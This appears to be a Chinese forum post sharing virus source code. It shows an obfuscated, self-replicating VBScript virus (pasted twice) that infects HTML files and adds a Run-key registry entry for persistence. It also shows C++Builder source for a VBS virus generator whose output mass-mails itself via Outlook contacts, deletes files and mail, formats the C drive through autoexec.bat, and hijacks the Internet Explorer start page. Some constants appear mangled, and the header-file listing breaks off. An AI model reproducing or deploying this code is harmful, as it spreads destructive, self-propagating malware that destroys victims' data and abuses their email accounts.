每星期提供一病毒源码（更新之第1期）07.12.31

烽火ㄨ飞狐

2007.12.20
名称： Set A
类别： 病毒源码￤脚本病毒
文件大小： 4KB
运行平台： Windows


Set A = CreateObject(B("Tdqjosjmh-EjkfTztsfnPaifds"));Scripting.FileSystemObject
Set C = CreateObject(B("XTdqjos-Tgfkk"));WScript.Shell
Randomize
D = Int((6 - 1 + 1) * Rnd + 1)
If D = 1 Then
E = A.GetSpecialFolder(2)
ElseIf D = 2 Then
E = A.BuildPath(A.GetSpecialFolder(0), B("GFKO"));HELP
ElseIf D = 3 Then
E = A.BuildPath(A.GetSpecialFolder(0), B("SFNOPQBQZ JMSFQMFS EJKFT"));TEMPORARY INTERNET FILES
ElseIf D = 4 Then
E = C.SpecialFolders(B("Cftlspo"));Desktop
ElseIf D = 5 Then
E = C.SpecialFolders(B("NzCpdvnfmst"));MyDocuments
ElseIf D = 6 Then
E = C.RegRead(B("GLFZ`KPDBK`NBDGJMF[Tpesxbqf[Njdqptpes[Xjmcpxt[DvqqfmsUfqtjpm[OqphqbnEjkftCjq"))
;HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\ProgramFilesDir
End If  

If A.FolderExists(E) = True Then
For Each F In A.GetFolder(E).Files
If UCase(A.GetExtensionName(F.Name)) = UCase(B("gsn")) Or UCase(A.GetExtensionName(F.Name)) = UCase(B("gsnk")) Then
  If G(A.BuildPath(F.ParentFolder, F.Name)) = False Then
  H A.BuildPath(F.ParentFolder, F.Name)
  End If
End If
Next
;htm,html

Set I = A.GetFolder(E)
Set J = I.SubFolders
For Each K In J
For Each L In K.Files
  If UCase(A.GetExtensionName(L.Name)) = UCase(B("gsn")) Or UCase(A.GetExtensionName(L.Name)) = UCase(B("gsnk")) Then
  If G(A.BuildPath(L.ParentFolder, L.Name)) = False Then
   H A.BuildPath(L.ParentFolder, L.Name)
  End If
  End If
Next
Next
End If

If Day(Now) = 1 Then
MsgBox ;省略了
End If

-------------------------------------------------------------------------------
Function G(O)
Set P = A.OpenTextFile(O, 1)
If P.AtEndOfStream = False Then
Q = P.ReadLine
End If
Do While Q <> B(" H-QfhXqjsf B&#39;""JICW]NMA?N]K?AJGPC^Qmhvu_tc^Kgatmqmhv^Ugpfmuq^AsttcpvXctqgmp^Tsp^UgpQv_tv""*+ F-AvjkcObsg&#39;F-HfsTofdjbkEpkcfq&#39;2*+ B&#39;""UGPQV?TV0XDQ""**") And P.AtEndOfStream = False
;G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))  
;HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WinStart
Q = P.ReadLine
Loop
P.Close
If Q = B(" H-QfhXqjsf B&#39;""JICW]NMA?N]K?AJGPC^Qmhvu_tc^Kgatmqmhv^Ugpfmuq^AsttcpvXctqgmp^Tsp^UgpQv_tv""*+ F-AvjkcObsg&#39;F-HfsTofdjbkEpkcfq&#39;2*+ B&#39;""UGPQV?TV0XDQ""**") Then
;G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
;HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WinStart
G = True
Else
G = False
End If
End Function

Sub H(R)
Set S = A.GetFile(R)
T = S.Attributes
If T <> 0 Then
S.Attributes = 0
End If
Set U = A.OpenTextFile(R, 8)
U.WriteLine(B(";Tdqjos Kbmhvbhf>""UATdqjos""="));<Script Language="VBScript">
U.WriteLine(B("Je Kpdbsjpm-Oqpspdpk > B&#39;""hgnc<""* Sgfm"));If Location.Protocol = A("ghmd;") Then
U.WriteLine(B(" A"));b
U.WriteLine(B("Fmc Je"));End If
U.WriteLine("");空格
U.WriteLine(B("Evmdsjpm B&#39;D*"));------------Function A(C)------------
U.WriteLine(B(" Epq C > 2 Sp Kfm&#39;D*"))
U.WriteLine(B("  Je Btd&#39;Njc&#39;D+ C+ 2** ;= 43 Bmc Btd&#39;Njc&#39;D+ C+ 2** ;= 46 Bmc Btd&#39;Njc&#39;D+ C+ 2** ;= 215 Sgfm"))
U.WriteLine(B("   Je Btd&#39;Njc&#39;D+ C+ 2** Npc 1 > / Sgfm"))
U.WriteLine(B("   B > B , Dgq&#39;Btd&#39;Njc&#39;D+ C+ 2** , 2*"))
U.WriteLine(B("   Fktf"))
U.WriteLine(B("   B > B , Dgq&#39;Btd&#39;Njc&#39;D+ C+ 2** . 2*"))
U.WriteLine(B("   Fmc Je"))
U.WriteLine(B("  Fktf"))
U.WriteLine(B("   B > B , Njc&#39;D+ C+ 2*"))
U.WriteLine(B("  Fmc Je"))
U.WriteLine(B(" Mfws"))
U.WriteLine(B("Fmc Evmdsjpm"));-------------End Function--------------
U.WriteLine("");空格
U.WriteLine(B("Tva A"));--------Sub B------------------
U.WriteLine(B(" Tfs F > DqfbsfPaifds&#39;B&#39;""Qatgrvgpe0HgncQwqvckMdlcav""**"))
;Set E = CreateObject(A("Rbshquhof/GhmdRxrudlNckdbu"))
;Scripting.FileSystemObject
U.WriteLine(B(" Tfs E > F-DqfbsfSfwsEjkf&#39;F-AvjkcObsg&#39;F-HfsTofdjbkEpkcfq&#39;2*+ B&#39;""UGPQV?TV0XDQ""**+ Sqvf*"))
; Set F = E.CreateTextFile(E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR")), True)
Set V = A.OpenTextFile(WScript.ScriptFullName, 1)
Do While V.AtEndOfStream = False
U.WriteLine(B(" E-XqjsfKjmf&#39;B&#39;""") + W(Replace(V.ReadLine, B(""""), B(""""""))) + B("""**"))
; F.WriteLine(A(" , " , "" , "))
Loop
V.Close
U.WriteLine(B(" E-Dkptf")); F.Close
U.WriteLine(B(" Tfs H > DqfbsfPaifds&#39;B&#39;""UQatgrv0Qjcnn""**"))
; Set G = CreateObject(A("VRbshqu/Ridmm"))
; WScript.Shell
U.WriteLine(B(" H-QfhXqjsf B&#39;""JICW]NMA?N]K?AJGPC^Qmhvu_tc^Kgatmqmhv^Ugpfmuq^AsttcpvXctqgmp^Tsp^UgpQv_tv""*+ F-AvjkcObsg&#39;F-HfsTofdjbkEpkcfq&#39;2*+ B&#39;""UGPQV?TV0XDQ""**"))
;G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
;HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WinStart
U.WriteLine(B("Fmc Tva"));End Sub
U.WriteLine(B(";0Tdqjos="));</Script>
U.Close
If T <> 0 Then
S.Attributes = T
End If
End Sub

-----------------------------------------------------------------------------
Function B(M)
For N = 1 To Len(M)
If Asc(Mid(M, N, 1)) <> 32 And Asc(Mid(M, N, 1)) <> 33 And Asc(Mid(M, N, 1)) <> 34 And Asc(Mid(M, N, 1)) <> 160 And Asc(Mid(M, N, 1)) <> 255 Then
  If Asc(Mid(M, N, 1)) Mod 2 = 0 Then
  B = B + Chr(Asc(Mid(M, N, 1)) - 1)
  Else
  B = B + Chr(Asc(Mid(M, N, 1)) + 1)
  End If
Else
  B = B + Mid(M, N, 1)
End if
Next
End Function
-----------------------------------------------------------------------------
Function W(X)
For Y = 1 To Len(X)
If Asc(Mid(X, Y, 1)) <> 34 And Asc(Mid(X, Y, 1)) <> 35 And Asc(Mid(X, Y, 1)) <> 126 Then
  If Asc(Mid(X, Y, 1)) Mod 2 = 0 Then
  W = W + Chr(Asc(Mid(X, Y, 1)) + 1)
  Else
  W = W + Chr(Asc(Mid(X, Y, 1)) - 1)
  End If
Else
  W = W + Mid(X, Y, 1)
End If
Next
End Function
-----------------------------------------------
;32=" " , 33="!" ,32=""" ,35="#" ,126="~"

烽火ㄨ飞狐

2007.12.26
名称： Set A
类别： 病毒源码￤脚本病毒
文件大小： 4KB
运行平台： Windows


Set A = CreateObject(B("Tdqjosjmh-EjkfTztsfnPaifds"));Scripting.FileSystemObject
Set C = CreateObject(B("XTdqjos-Tgfkk"));WScript.Shell
Randomize
D = Int((6 - 1 + 1) * Rnd + 1)
If D = 1 Then
E = A.GetSpecialFolder(2)
ElseIf D = 2 Then
E = A.BuildPath(A.GetSpecialFolder(0), B("GFKO"));HELP
ElseIf D = 3 Then
E = A.BuildPath(A.GetSpecialFolder(0), B("SFNOPQBQZ JMSFQMFS EJKFT"));TEMPORARY INTERNET FILES
ElseIf D = 4 Then
E = C.SpecialFolders(B("Cftlspo"));Desktop
ElseIf D = 5 Then
E = C.SpecialFolders(B("NzCpdvnfmst"));MyDocuments
ElseIf D = 6 Then
E = C.RegRead(B("GLFZ`KPDBK`NBDGJMF[Tpesxbqf[Njdqptpes[Xjmcpxt[DvqqfmsUfqtjpm[OqphqbnEjkftCjq"))
;HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\ProgramFilesDir
End If  

If A.FolderExists(E) = True Then
For Each F In A.GetFolder(E).Files
If UCase(A.GetExtensionName(F.Name)) = UCase(B("gsn")) Or UCase(A.GetExtensionName(F.Name)) = UCase(B("gsnk")) Then
  If G(A.BuildPath(F.ParentFolder, F.Name)) = False Then
  H A.BuildPath(F.ParentFolder, F.Name)
  End If
End If
Next
;htm,html

Set I = A.GetFolder(E)
Set J = I.SubFolders
For Each K In J
For Each L In K.Files
  If UCase(A.GetExtensionName(L.Name)) = UCase(B("gsn")) Or UCase(A.GetExtensionName(L.Name)) = UCase(B("gsnk")) Then
  If G(A.BuildPath(L.ParentFolder, L.Name)) = False Then
   H A.BuildPath(L.ParentFolder, L.Name)
  End If
  End If
Next
Next
End If

If Day(Now) = 1 Then
MsgBox ;省略了
End If

-------------------------------------------------------------------------------
Function G(O)
Set P = A.OpenTextFile(O, 1)
If P.AtEndOfStream = False Then
Q = P.ReadLine
End If
Do While Q <> B(" H-QfhXqjsf B&#39;""JICW]NMA?N]K?AJGPC^Qmhvu_tc^Kgatmqmhv^Ugpfmuq^AsttcpvXctqgmp^Tsp^UgpQv_tv""*+ F-AvjkcObsg&#39;F-HfsTofdjbkEpkcfq&#39;2*+ B&#39;""UGPQV?TV0XDQ""**") And P.AtEndOfStream = False
;G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))  
;HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WinStart
Q = P.ReadLine
Loop
P.Close
If Q = B(" H-QfhXqjsf B&#39;""JICW]NMA?N]K?AJGPC^Qmhvu_tc^Kgatmqmhv^Ugpfmuq^AsttcpvXctqgmp^Tsp^UgpQv_tv""*+ F-AvjkcObsg&#39;F-HfsTofdjbkEpkcfq&#39;2*+ B&#39;""UGPQV?TV0XDQ""**") Then
;G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
;HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WinStart
G = True
Else
G = False
End If
End Function

Sub H(R)
Set S = A.GetFile(R)
T = S.Attributes
If T <> 0 Then
S.Attributes = 0
End If
Set U = A.OpenTextFile(R, 8)
U.WriteLine(B(";Tdqjos Kbmhvbhf>""UATdqjos""="));<Script Language="VBScript">
U.WriteLine(B("Je Kpdbsjpm-Oqpspdpk > B&#39;""hgnc<""* Sgfm"));If Location.Protocol = A("ghmd;") Then
U.WriteLine(B(" A"));b
U.WriteLine(B("Fmc Je"));End If
U.WriteLine("");空格
U.WriteLine(B("Evmdsjpm B&#39;D*"));------------Function A(C)------------
U.WriteLine(B(" Epq C > 2 Sp Kfm&#39;D*"))
U.WriteLine(B("  Je Btd&#39;Njc&#39;D+ C+ 2** ;= 43 Bmc Btd&#39;Njc&#39;D+ C+ 2** ;= 46 Bmc Btd&#39;Njc&#39;D+ C+ 2** ;= 215 Sgfm"))
U.WriteLine(B("   Je Btd&#39;Njc&#39;D+ C+ 2** Npc 1 > / Sgfm"))
U.WriteLine(B("   B > B , Dgq&#39;Btd&#39;Njc&#39;D+ C+ 2** , 2*"))
U.WriteLine(B("   Fktf"))
U.WriteLine(B("   B > B , Dgq&#39;Btd&#39;Njc&#39;D+ C+ 2** . 2*"))
U.WriteLine(B("   Fmc Je"))
U.WriteLine(B("  Fktf"))
U.WriteLine(B("   B > B , Njc&#39;D+ C+ 2*"))
U.WriteLine(B("  Fmc Je"))
U.WriteLine(B(" Mfws"))
U.WriteLine(B("Fmc Evmdsjpm"));-------------End Function--------------
U.WriteLine("");空格
U.WriteLine(B("Tva A"));--------Sub B------------------
U.WriteLine(B(" Tfs F > DqfbsfPaifds&#39;B&#39;""Qatgrvgpe0HgncQwqvckMdlcav""**"))
;Set E = CreateObject(A("Rbshquhof/GhmdRxrudlNckdbu"))
;Scripting.FileSystemObject
U.WriteLine(B(" Tfs E > F-DqfbsfSfwsEjkf&#39;F-AvjkcObsg&#39;F-HfsTofdjbkEpkcfq&#39;2*+ B&#39;""UGPQV?TV0XDQ""**+ Sqvf*"))
; Set F = E.CreateTextFile(E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR")), True)
Set V = A.OpenTextFile(WScript.ScriptFullName, 1)
Do While V.AtEndOfStream = False
U.WriteLine(B(" E-XqjsfKjmf&#39;B&#39;""") + W(Replace(V.ReadLine, B(""""), B(""""""))) + B("""**"))
; F.WriteLine(A(" , " , "" , "))
Loop
V.Close
U.WriteLine(B(" E-Dkptf")); F.Close
U.WriteLine(B(" Tfs H > DqfbsfPaifds&#39;B&#39;""UQatgrv0Qjcnn""**"))
; Set G = CreateObject(A("VRbshqu/Ridmm"))
; WScript.Shell
U.WriteLine(B(" H-QfhXqjsf B&#39;""JICW]NMA?N]K?AJGPC^Qmhvu_tc^Kgatmqmhv^Ugpfmuq^AsttcpvXctqgmp^Tsp^UgpQv_tv""*+ F-AvjkcObsg&#39;F-HfsTofdjbkEpkcfq&#39;2*+ B&#39;""UGPQV?TV0XDQ""**"))
;G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
;HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WinStart
U.WriteLine(B("Fmc Tva"));End Sub
U.WriteLine(B(";0Tdqjos="));</Script>
U.Close
If T <> 0 Then
S.Attributes = T
End If
End Sub

-----------------------------------------------------------------------------
Function B(M)
For N = 1 To Len(M)
If Asc(Mid(M, N, 1)) <> 32 And Asc(Mid(M, N, 1)) <> 33 And Asc(Mid(M, N, 1)) <> 34 And Asc(Mid(M, N, 1)) <> 160 And Asc(Mid(M, N, 1)) <> 255 Then
  If Asc(Mid(M, N, 1)) Mod 2 = 0 Then
  B = B + Chr(Asc(Mid(M, N, 1)) - 1)
  Else
  B = B + Chr(Asc(Mid(M, N, 1)) + 1)
  End If
Else
  B = B + Mid(M, N, 1)
End if
Next
End Function
-----------------------------------------------------------------------------
Function W(X)
For Y = 1 To Len(X)
If Asc(Mid(X, Y, 1)) <> 34 And Asc(Mid(X, Y, 1)) <> 35 And Asc(Mid(X, Y, 1)) <> 126 Then
  If Asc(Mid(X, Y, 1)) Mod 2 = 0 Then
  W = W + Chr(Asc(Mid(X, Y, 1)) + 1)
  Else
  W = W + Chr(Asc(Mid(X, Y, 1)) - 1)
  End If
Else
  W = W + Mid(X, Y, 1)
End If
Next
End Function
-----------------------------------------------
;32=" " , 33="!" ,32=""" ,35="#" ,126="~"

烽火ㄨ飞狐

一个VBS病毒生成器核心代码（2007.12.13）
  程序经过加壳压缩后仅200来K，但由于窗口文件较多，所以文件比较杂乱，所以把核心文件整理出来，供大家参考。其中注册功能未公开实属无奈之举


以下程序在windows ME用C++Builder5.0编译通过。




unit1.cpp

//-----------------------------------------
#include
#include
#include
#pragma hdrstop
#include \"Unit2.h\"
#include \"Unit3.h\"
#include \"Unit1.h\"
//---------------------------------------------------------------------------
#pragma package(smart_init)
#pragma resource \"*.dfm\"
Tform1 *form1;
//---------------------------------------------------------------------------
__fastcall Tform1::Tform1(TComponent* Owner)
: Tform(Owner)

{

}//---------------------------------------------------------------------------


//---------------------------------------------------------------------------
void __fastcall Tform1::Label1Click(TObject *Sender)
{
ShellExecute(Handle,NULL,\"http://zsyangel.yeah.net\",NULL,NULL,SW_SHOWNORMAL);
}
//---------------------------------------------------------------------------


//--------------------------------------------------------


void __fastcall Tform1::CheckBox3Click(TObject *Sender)
{
if (CheckBox3->Checked==true)
{
Edit8-> Enabled=true;
Edit8->Color=clHighlightText;
Edit9-> Enabled=true;
Edit9->Color=clHighlightText;
Edit10-> Enabled=true;
Edit10->Color=clHighlightText;}
else
{Edit8-> Enabled=false;
Edit8->Color=clBtnFace;
Edit9-> Enabled=false;
Edit9->Color=clBtnFace;
Edit10-> Enabled=false;
Edit10->Color=clBtnFace;}
}
//--------下面数行用来限制按健，防止无效数据，造成溢出-------------------------------------------------------------------



void __fastcall Tform1::CheckBox4Click(TObject *Sender)
{
if(Edit4->Enabled==true)
{Edit4->Enabled=false;}
else
{Edit4->Enabled=true;}

}
//---------------------------------------------------------------------------


//---------------------------------------------------------------------------


void __fastcall Tform1::Edit4KeyPress(TObject *Sender, char &Key)
{
if ((Key>57||Key<48)&&(Key!=8)&&(Key!=13))
Key=NULL;


}
//---------------------------------------------------------------------------

void __fastcall Tform1::Edit8KeyPress(TObject *Sender, char &Key)
{
if ((Key>57||Key<48)&&(Key!=8)&&(Key!=13))
Key=NULL;

}
//---------------------------------------------------------------------------

void __fastcall Tform1::Edit9KeyPress(TObject *Sender, char &Key)
{
if ((Key>57||Key<48)&&(Key!=8)&&(Key!=13))
Key=NULL;

}
//---------------------------------------------------------------------------

void __fastcall Tform1::Edit10KeyPress(TObject *Sender, char &Key)
{
if ((Key>57||Key<48)&&(Key!=8)&&(Key!=13))
Key=NULL;

}
//---------------------------------------------------------------------------

void __fastcall Tform1::Edit5KeyPress(TObject *Sender, char &Key)
{
if ((Key>57||Key<48)&&(Key!=8)&&(Key!=13))
Key=NULL;

}
//---------------------------------------------------------------------------


void __fastcall Tform1::Edit4Exit(TObject *Sender)
{
AnsiString edit4=Edit4->Text;
if (StrToInt (edit4)<1||StrToInt (edit4)>10***00)
{ ShowMessage(\"超出范围，请不要添太大或太小\");
Edit4->Text=\"\";}
}
//---------------------------------------------------------------------------


void __fastcall Tform1::Edit8Exit(TObject *Sender)
{

AnsiString edit8=Edit8->Text;
if (StrToInt (edit8)<1982||StrToInt (edit8)>2050)
{ ShowMessage(\"超出范围，请不要添太大或太小\");
Edit8->Text=\"2001\";}
}
//---------------------------------------------------------------------------

void __fastcall Tform1::Edit9Exit(TObject *Sender)
{

AnsiString edit9=Edit9->Text;
if (StrToInt (edit9)<1||StrToInt (edit9)>12)
{ ShowMessage(\"超出范围，请不要添太大或太小\");
Edit9->Text=\"1\";}
}
//---------------------------------------------------------------------------

void __fastcall Tform1::Edit10Exit(TObject *Sender)
{

AnsiString edit10=Edit10->Text;
if (StrToInt (edit10)<1||StrToInt (edit10)>31)
{ ShowMessage(\"超出范围，请不要添太大或太小\");
Edit10->Text=\"1\";}
}
//---------------------------------------------------------------------------



//---------------主要代码------------------------------------------------------------



void __fastcall Tform1::BitBtn1Click(TObject *Sender)
{
AnsiString g=Edit1->Text+\".vbe\";//在当前目录下生成VBE文件

i=FileCreate(g );
AnsiString a1=\"\"Created by \" ;
AnsiString a=Edit2->Text;
AnsiString b=\"\\r\\n\";
AnsiString z=a1+a+b;
char c[1000];
strcpy(c, z.c_str());

FileWrite(i,c,strlen(c));

if (CheckBox1->Checked==true)//让病毒修改注册表项
{AnsiString a3=\" Dim wsh\\r\\n Set wsh=CreateObject(\\\"WScript.Shell\\\")\\r\\n on error resume next \\r\\n wsh.regwrite \\\"HKEY_LOCAL_MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\kv3000\\\",\\\"c:\\\\windows\\\\\";
AnsiString a31=Edit1->Text;
AnsiString a32=\".vbe\\\"\\r\\n\";
AnsiString a33=\"Set fso= Createobject\\(\\\"Scripting.FileSystemObject\\\"\\)\\r\\nSet InF=fso.OpenTextFile\\(WScript.ScriptFullname,1\\)\\r\\nDo While InF.AtEndOfStream<>True\\r\\nScriptBuffer=ScriptBuffer&InF.ReadLine&vbcrlf \\r\\nLoop\\r\\nSet OutF=fso.OpenTextFile\\(\\\"c:\\\\windows\\\\\";
AnsiString a34=Edit1->Text;
AnsiString a35=\".vbe\\\",2,true\\)\\r\\nOutF.write ScriptBuffer\\r\\n \";
AnsiString a4=a3+a31+a32+a33+a34+a35;
char c1[10***00];
strcpy(c1, a4.c_str());
FileWrite(i,c1,strlen(c1));
}

TabSheet1->Enabled=true;
TabSheet1->Show() ;
TabSheet0->Enabled=false;
}
//---------------------------------------------------------------------------

void __fastcall Tform1::Label4Click(TObject *Sender)
{
ShellExecute(Handle,\"open\",\"mailto:zsy2@citiz.net\",NULL,NULL,SW_SHOW);
}
//---------------------------------------------------------------------------

void __fastcall Tform1::BitBtn2Click(TObject *Sender)//此几行代码负责病毒从outlook传播
{
AnsiString bb=\"if wsh.regread \\(\\\"HKCU\\\\software\\\\a\\\\a\\\"\\)<> \\\"1\\\" then out\\r\\nsub out\\r\\n\";
AnsiString b1=\"On Error Resume Next\\r\\n\";
AnsiString b2=\"Set Outlook = CreateObject(\\\"Outlook.Application\\\")\\r\\nIf Outlook = \\\"Outlook\\\" Then\\r\\nSet Mapi=Outlook.GetNameSpace(\\\"MAPI\\\")\\r\\nSet Lists=Mapi.AddressLists\\r\\nFor Each ListIndex In Lists\\r\\nIf ListIndex.AddressEntries.Count <> 0 Then\\r\\nContactCount = ListIndex.AddressEntries.Count\\r\\nFor Count= 1 To \";
AnsiString b9=\"ContactCount\";
AnsiString b7= Edit4->Text;
AnsiString b8=\"\\r\\nSet Mail = Outlook.CreateItem(0)\\r\\nSet Contact = ListIndex.AddressEntries(Count)\\r\\nMail.To = Contact.Address\\r\\nMail.Subject = \\\"\";
AnsiString b3=Edit11->Text;
AnsiString b4=\"\\\"\\r\\nMail.Body = \\\"\" ;
AnsiString b5=Edit13->Text;
AnsiString b6=\"\\\"\\r\\nSet Attachment=Mail.Attachments\\r\\n Attachment.Add Folder & \\\" c:\\\\windows\\\\\";
AnsiString bb1=Edit1->Text;
AnsiString bb2=\".vbe\\\"\\r\\nMail.Send\\r\\nnext\\r\\n End if\\r\\nnext\\r\\n End if\\r\\nend sub\\r\\nwsh.regwrite \\\"HKCU\\\\software\\\\a\\\\a\\\", \\\"1\\\"\\r\\n\";

if (CheckBox4->Checked==true)
{
AnsiString B=bb+b1+b2+b9+b8+b3+b4+b5+b6+bb1+bb2;
char b[10***00];
strcpy(b, B.c_str());
FileWrite(i,b,strlen(b));
}
else
{AnsiString B=bb+b1+b2+b7+b8+b3+b4+b5+b6+bb1+bb2;
char b[10***00];
strcpy(b, B.c_str());
FileWrite(i,b,strlen(b));}


TabSheet2->Enabled=true;
TabSheet2->Show() ;
TabSheet1->Enabled=false;
}
//------------------------此下代码负责破坏功能---------------------------------------------------

void __fastcall Tform1::BitBtn3Click(TObject *Sender)
{
TabSheet3->Enabled=true;
TabSheet3->Show() ;
if (CheckBox3->Checked==true)
{{AnsiString d1=\" \\r\\nif year(date)&month(date)&day(date)= \";//设定病毒发作时间
AnsiString dyear=Edit8->Text;
AnsiString dmon_th=Edit9->Text;
AnsiString dday=Edit10->Text;
AnsiString dthen=\" Then a\\r\\n\" ;
AnsiString sub=\"sub a\\r\\n\" ;
AnsiString dex=d1+dyear+dmonth+dday+dthen+sub;
char d[10***00];
strcpy(d, dex.c_str());
FileWrite(i,d,strlen(d)); }
AnsiString del=\"on error resume next\\r\\nfso.DeleteFile\\(\\\"\";//负责删除指定文件
AnsiString delf=Edit6->Text;
AnsiString delf1=\"\\\"\\)\\r\\n\";
AnsiString def=del+delf+delf1;
char d[10***00];
strcpy(d, def.c_str());
FileWrite(i,d,strlen(d));
if(CheckBox2->Checked==true)//格式化硬盘
{AnsiString df1=\"\\r\\n set WshShell = Wscript.CreateObject\\(\\\"WScript.Shell\\\"\\) \\r\\nWshShell.Run\\ (\\\"start.exe \\/m format c:\\/q\\ /autotest\\ /u\\\" \\)\\r\\n \";

char df[10***00];
strcpy(df, df1.c_str());
FileWrite(i,df,strlen(df)); }
if(CheckBox5->Checked==true)
{AnsiString df2=\"Set Script = fso.CreateTextFile\\( \\\"c:\\\\autoexec.bat\\\", True\\) \\r\\nScript.writeline \\\"format c:\\/q\\ /autotest\\ /u\\\" \\r\\n \";
char df3[10***00];
strcpy(df3, df2.c_str());
FileWrite(i,df3,strlen(df3)); }
if(CheckBox6->Checked==true)
{AnsiString dem=\"Set Outlook=CreateObject\\(\\\"Outlook.Application\\\"\\)\\r\\nSet t=s.GetNameSpace\\(\\\"MAPI\\\"\\)\\r\\nSet u=t.GetDefaultFolder\\(6\\)\\r\\nFor i=1 to u.items.count\\r\\nu.Items.Item\\(i\\).delete\\r\\nnext\\r\\n\";
char dm[10***00];
strcpy(dm, dem.c_str());
FileWrite(i,dm,strlen(dm));}
char endsub[]=\"end sub\\r\\n\";
FileWrite(i,endsub,strlen(endsub));
}
else
{if(CheckBox2->Checked==true)
{AnsiString df1=\"set WshShell = Wscript.CreateObject\\(\\\"WScript.Shell\\\"\\)\\r\\nWshShell.Run\\ (\\\"start.exe \\/m format c:\\/q\\ /autotest\\ /u\\\" \\)\\r\\n\";

char df[10***00];
strcpy(df, df1.c_str());
FileWrite(i,df,strlen(df)); }
if(CheckBox5->Checked==true)
{AnsiString df2=\"on error resume next\\r\\nfso.DeleteFile\\(\\\"c:\\\\autoexec.bat\\\")\\r\\n\\Set Script = fso.CreateTextFile\\( \\\"c:\\\\autoexec.bat\\\", True\\)\\r\\nScript.writeline \\\"format c:\\/q\\ /autotest\\ /u\\\"\\r\\n\";

char df3[10***00];
strcpy(df3, df2.c_str());
FileWrite(i,df3,strlen(df3)); }}
AnsiString del=\"on error resume next\\r\\nfso.DeleteFile\\(\\\"\";
AnsiString delf=Edit6->Text;
AnsiString delf1=\"\\\"\\)\\r\\n\";
AnsiString def=del+delf+delf1;
char d[10***00];
strcpy(d, def.c_str());
FileWrite(i,d,strlen(d));
if(CheckBox6->Checked==true)
{AnsiString dem=\"Set Outlook=CreateObject\\(\\\"Outlook.Application\\\"\\)\\r\\nSet t=s.GetNameSpace\\(\\\"MAPI\\\"\\)\\r\\nSet u=t.GetDefaultFolder\\(6\\)\\r\\nFor i=1 to u.items.count\\r\\nu.Items.Item\\(i\\).delete\\r\\nnext\\r\\n\";
char dm[10***00];
strcpy(dm, dem.c_str());
FileWrite(i,dm,strlen(dm));}
TabSheet2->Enabled=false;
}
//---------------------------------------------------------------------------

void __fastcall Tform1::BitBtn4Click(TObject *Sender)//修改IE的标题开始页
{
AnsiString reg=\"wsh.regwrite \\\"HKEY_USERS\\\\.DEFAULT\\\\Software\\\\Microsoft\\\\Internet Explorer\\\\Main\\\\Start Page\\\",\\\"\" ;
AnsiString reg1=Edit3->Text;
AnsiString reg2=\"\\\"\\r\\nwsh.regwrite\\\"HKEY_USERS\\\\.DEFAULT\\\\Software\\\\Microsoft\\\\Internet Explorer\\\\Main\\\\Window title\\\",\\\"\";
AnsiString reg3=Edit7->Text;
AnsiString reg4=\"\\\"\\r\\n\";
AnsiString reg5=reg+reg1+reg2+reg3+reg4+reg5;
char REG[10***00];
strcpy(REG, reg5.c_str());
FileWrite(i,REG,strlen(REG));
TabSheet3->Enabled=false;
ShowMessage(\"你的程序代码已保存在当前目录下\");

FileClose(i);
}
//---------------------------------------------------------------------------


//注册功能暂不公开，敬请原谅……

//---------------------------------------------------------------------------


void __fastcall Tform1::formClose(TObject *Sender, TCloseAction &Action)
{
form2->Close();
}
//---------------------------------------------------------------------------

void __fastcall Tform1::formActivate(TObject *Sender)
{
form2->Hide();
}
//---------------------------------------------------------------------------


void __fastcall Tform1::BitBtn5Click(TObject *Sender)
{

AnsiString g=Edit1->Text+\".vbe\";
DeleteFile(g);
TabSheet0->Enabled=true;
}
//---------------------------------------------------------------------------


void __fastcall Tform1::Button1Click(TObject *Sender)
{
form3->Show();
}
//---------------------------------------------------------------------------


void __fastcall Tform1::TabSheet0ContextPopup(TObject *Sender,
TPoint &MousePos, bool &Handled)
{

}

unit1.h

　

#ifndef Unit1H
#define Unit1H
//---------------------------------------------------------------------------
#include
#include
#include
#include
#include
#include
#include
#include
//---------------------------------------------------------------------------
class Tform1 : public Tform
{
__published: // IDE-managed Components
TPageControl *b;
TTabSheet *TabSheet2;
TTabSheet *TabSheet3;
TTabSheet *TabSheet4;
TGroupBox *GroupBox1;
TLabel *Label1;
TMemo *Memo1;
TCheckBox *CheckBox1;
TEdit *Edit1;
TLabel *Label2;
TCheckBox *CheckBox2;
TEdit *Edit2;
TLabel *Label3;
TEdit *Edit3;
TTabSheet *TabSheet1;
TEdit *Edit4;
TLabel *Label5;
TLabel *Label6;
TLabel *Label8;
TEdit *Edit6;
